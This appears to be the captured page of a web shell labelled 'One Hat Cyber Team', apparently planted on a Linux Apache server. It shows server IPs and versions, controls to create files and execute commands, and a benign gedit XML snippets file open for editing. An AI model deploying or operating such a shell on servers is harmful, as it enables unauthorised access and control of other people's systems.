One Hat Cyber Team
Your IP :
216.73.217.86
Server IP :
157.15.65.100
Server :
Linux 157-15-65-100.cprapid.com 5.14.0-362.24.2.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Mar 30 14:11:54 EDT 2024 x86_64
Server Software :
Apache
PHP Version :
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
gedit
/
plugins
/
snippets
/
Edit File:
xml.xml
<?xml version="1.0" encoding="UTF-8"?> <snippets language="XML"> <snippet id="""> <text><![CDATA[<${1:name} ${2:attr}="${3:value}">$0</${1}>]]></text> <description>Long Attribute Tag</description> <tag>"</tag> </snippet> <snippet id="<"> <text><![CDATA[<${1:name}>$0</${1}> ]]></text> <description>Long Tag</description> <tag><</tag> </snippet> <snippet id=">"> <text><![CDATA[<${1:name} />]]></text> <description>Short Tag</description> <tag>></tag> </snippet> <snippet id="cdata"> <text><![CDATA[<![CDATA[$0]]]]><![CDATA[>]]></text> <tag>cdata</tag> <description>CDATA</description> </snippet> </snippets>
Simpan